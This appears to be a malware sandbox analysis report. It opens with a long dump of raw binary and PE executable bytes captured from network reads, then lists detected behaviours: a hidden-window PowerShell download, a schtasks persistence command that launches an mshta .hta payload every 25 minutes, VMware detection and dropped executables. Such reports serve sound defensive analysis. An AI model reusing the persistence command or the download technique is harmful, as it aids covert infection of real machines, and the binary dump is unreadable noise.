ÐDÚòÿâÖÄ»EÂAòÖÄ»E!ÓDÆöÿÿÿÿæÖÄ»AâÿÿÿÿD ÚD Ö1òðÿAÒA1ÂA!ÒDÐðÿDÊ1ÂD!ÊDÈðÿ%¤Zs»Að¤Zs»E!ÁEÓAóÿAã¤Zs»E!ÂD ÈE ÓD1ØAÐA!À1ÂA ÐDD$\HL$hèHD$PHL$hè`{HÁèD$LÇD$HÇD$tôS~MD$tÁé ¦D$,éTéD$,-d³¤géD$,-h¥ÚéD$,-ð§=éD$,-þ/»zéD$,-áÂ 4éD$,-¤Nã_éD$,-8t<çGéD$,-Øò9<éD$,-(àVpéD$,-éÊ-*zéD$,-íH<éD$,-¯ÁÐ%!éD$,-û &<éD$,- m5 éD$,-¿#¬Gv^éD$,-ôS~MZéD$,-6jV;éD$,-ös_(!éD$,-3c<GéD$,-±¤v_!ééyD$H;D$L¸ m5¹±¤vLÈL$téky1À ÊÈA¸ceàZAÀAèÜ£AèceàZAÁE)ÁAÈEÈAèõ0AÀÿ¢ÃRAÀõ0AÁAéEÈAÁAéÿ¢ÃREÈAÁE)ÁAÀAèùSz%EÁAÀE)È-Ü£AÀAÀö"ÞAèùSz%Aèö"ÞA¯ÈáùAÂú AÃDÓóÿã@¶@÷@÷DÕ@ ýAöAöAæÿ@ç@ëAþD0ó@÷@÷óÿ@õ@õ@ß@Í@÷ÿ@ ï@óóã@õ@õAîAæA÷A÷Aç@åDóAïD0ûóÿDÕ@0ÝD Õ@û@ ë@0ï@ûDß@÷ÿ@ç@õ@õEÞA îA÷A÷Aç@åD÷AïD0ÿ@õ@õ@÷ÿAöAö@ýAÎ@õÿD õ@÷@÷@çAöAöAæD÷@÷ÿEÞA0þE Þ@ïD ÷D0õ@ï@õ@õ@åAöAöE÷AçAôAôAäAæDýEôD0å@õÿ@õ@åÿAöAöAæA÷A÷EüAäAõAõAåÿAçEæEýE0îA÷A÷EôAôÿAõAõEçAÍA÷ÿE ïAôAôAäAõAõAåEìAôÿAõAõ@ð4EìAôÿA ÄAöÿAöAæÿ@èD øD0ý@èDå@õÿE÷A÷ÿAõAõ@éáE ìDúâE îDáDò0ÑDý@õÿAÍD í@éÂòÿâ@õ@õ@ èAÎAöÿAæ@ éÂAÎD0òØ4ÿ$@ññ@Ý@ ÍAöAöAæá@èAÎD0ð@ññá@õ@õ@å@é@õ@õ@åAöAö request_handle: 0x00cc000c	1	1
InternetReadFile March 24, 2025, 10:39 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $À6ÙfXfXfX£ 5fX£ #fXfY,fXÛfXÌfXÉfXRichfXPELºlÀKà d\|>Bÿ3@ðGð´G`éÀ.textÂcd `.rdataÊh@@.data¼N> @À.ndatað>À.rsrc`éGê@@Uìì\}t+}FEu H Ôí~HPÿuÿuÿuÿ\|@éKSV5Üí~WE¤Pÿuÿ@eôEEäPÿuÿ@}ðeðD@é¶FR¶VV¯UèÏ+Mè¯ÁÂ÷ÿM¶ÀÁàE¶FQ¯Á¶NU¯MèÁ÷ÿM¶VT¯Uè¶ÀÈ¶FP¯EÂ÷ÿÁá¶ÀÈEôPMøÿH@EðPEEäPÿuÿ@ÿuÿÓEè9}ènÿÿÿ~Xÿteÿv4ÿL@EÀtU}jWÇEäÇEèÿP@ÿvXWÿT@ÿu5X@WÿÖh EEäPjÿhÀm~Wÿ@ÿuWÿÖÿuÿÓE¤Pÿuÿ@_^3À[ÉÂL$¡èí~ÑiÒ @TöÂtUVWq3ÿ;5ìí~sDÎiÉ @DSöÁtGëöÁt ÏOÉt ëöÁuÙ3Úã3ÙF @;5ìí~rÊ[_^ÂUìQQUSèí~Vòiö @óF3ÉWMüMø¨t9Mtà¾FB;ìí~sDÂiÀ @\|BöÁt jRè¤ÿÿÿöÁu(öÁ@tÿEüöÁtÿEüëÿEøÐ;ìí~r¼3À_^[ÉÂ}ütó}øtN@ëçNáÿÿÿÉNëÖL$¡èí~V3öù s695ìí~v.PW¨u3ÿGÓçzütÈëàþFÂ @;5ìí~r×_^ÂUìì¡Üí~eüSVW=ìí~EøEø3Û9tK;ßsE5èí~ÆöÂu(EÀt<tMü3À@ÓàNüâ#ÈÁMüÓâ;ÂuCÆ @;ßrÆ;ßt ÿEüEø}ü rEü_^[ÉÂD$À}@iÀ@¹ð~+ÈQèjFÂVt$ëj ðí~ÆkÀÁ8t\Pèâ=ÿÿÿtUPèµÿÿÿÀu@FëHÎð+Á\|$t/¬m~jÿ5¤m~h0uÿ5¬m~ÿH@Phÿt$ÿx@ö}3À^Â¸ÿÿÿëõD$ Üí~jÿtlèiÿÿÿÂh°à@ÿt$è6Â¡¤ @ÿ4jè_LPè§EÃÆö}÷Ø¤ @ÈÁøiÀ@Wáÿ4¨ @Pè-Løö}Wè>FÇ_ÃUììSVWEüP¡°î~ÈP3ÛSÿuÿuÿ@;Ãui5@¿ë9]uKSðýÿÿPÿuüè²ÿÿÿÀuWðýÿÿPSÿuüÿÖÀtÕÿuüÿ@jèF;Ãt$Sÿ5°î~ÿuÿuÿÐëÿuüÿ@3À@_^[ÉÂ9°î~uîÿuÿuÿ@ÀuÞëßUì¡¤ @@VWÀtøë=î~ÇEP¡°î~EPjj"^è×þÿÿPWÿ@÷ØÀ÷Ð#E_^]ÂUìì¤¡Ôí~SVuWeüjY}Øó¥UàEøEÜøÚiÿ@iÛ@¹ð~ùÙMÜ ¤ @MØÁþùDbÿ$l,@jPèX4¸ÿÿÿéTÿm~}øtêjÿ,@ëàPèQýÿÿHjPègýÿÿéjPè4é3Éèùýÿÿø3À@Pÿ@é÷ÿuøÿ0@ééÁà}äu#î~@î~3ÉAèºýÿÿMÜî~é½@î~î~é¬Uäî~ 3ÀÉÀ#Mè DÜéÿ4î~éy m~54@ÉtRQÿÖEÜ m~ÉZPQÿÖéQjð^èMýÿÿÿuàPÿ@À7ÇEüé+jð^è'ýÿÿØSè´@ðötCj\VèR@ð·>3ÀPSfÿ@Àuÿ@=·uSÿ\|@¨uÿEüf>FFfÿu½}àtjæè¢üÿÿSh°pèCSÿx@é®jõèüÿÿé¢3öèüÿÿPè¿CÀÅEàéjÐ^èüÿÿjß^øèwüÿÿj^ØèmüÿÿSWÿt@Àtjãë}äÿÿÿWèsCÀ ÿÿÿSWèòLjäë3öè3üÿÿðEPSh Vÿp@Àt%E;Ævf8t$Vè/CÀtÀ,Pÿuè?Bë3ÀfÇEü}äÝh SSÿl@éËÎÿèÇûÿÿMQWh jPjÿh@À¦3ÀÇEüféjï^èûÿÿPWèE@éBþÿÿj1^è}ûÿÿðEÜàVuôEèÉ>V¾¨ @ÀtVèAëh°pVèAPèºFPè¢AVè¯A¿¸ A»ð~}\|1VèJB3ÉÀtMèQÀPÿd@ÈEÀý #Á÷ØÀ@E}uVèY?3À}À@Ph@Vèc?Eøøÿuk}uGSWèAVSèAÿuðh°à@èGWSèí@EÜÁøPh°à@èq=è]ÿÿÿHtVjúé&üÿÿÿuôjâèy0}é.ýÿÿÿî~éiÿuôjêè[0ÿ´î~3ÿWWÿuøÿuäèÐÿ ´î~}èÿØu}ìÿtEèPWPÿuøÿ`@ÿuøÿ¼@;ß ûþujéVè\FÿuôVè]@ëjîVèIFh VèÁ<éûÿÿ3öèÚùÿÿÿuàPè¸JéÈj1^èÄùÿÿÿuÜPè<Àxüÿÿ;EäuEèé;EìEðéjð^ë±3öFèùÿÿPèÞ?érjYè_ùÿÿjYEèTùÿÿ3öFØè`ùÿÿð3Àf9Eät 9EGVè¡?Û}Ø5;Ø~Ø^PWèo?uö}Wèr?ðyeuþ û3Àfwéðj ^èìøÿÿj1^øèâøÿÿ}ìPWuÿ@ÀÿÿÿEäéËÿ@ëè3öFè´øÿÿh ØWSÿ@Àt}ätWSÿ@Àu3Àuüf3Àf@éu3Éè\øÿÿ3ÉAðèRøÿÿ}ðu;ð¬þ request_handle: 0x00cc000c	1	1
InternetReadFile March 24, 2025, 10:39 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELú»gàÂd@F@pFÏUipø `ì@à.rsrcpü@À.idata @À À)@àycjszivjàP,Ô@ànspidvfq0FØ@à.taggant0@F"Þ@à request_handle: 0x00cc000c	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE"

Creates a suspicious Powershell process (4 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 51 e9 b0 d1 ff ff 33 34 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x209443 exception.instruction: in eax, dx exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2135107 exception.address: 0xa39443 registers.esp: 2883044 registers.edi: 7090345 registers.eax: 1447909480 registers.ebp: 3999068180 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 10701788 registers.ecx: 20	1	0	0

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE

random.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All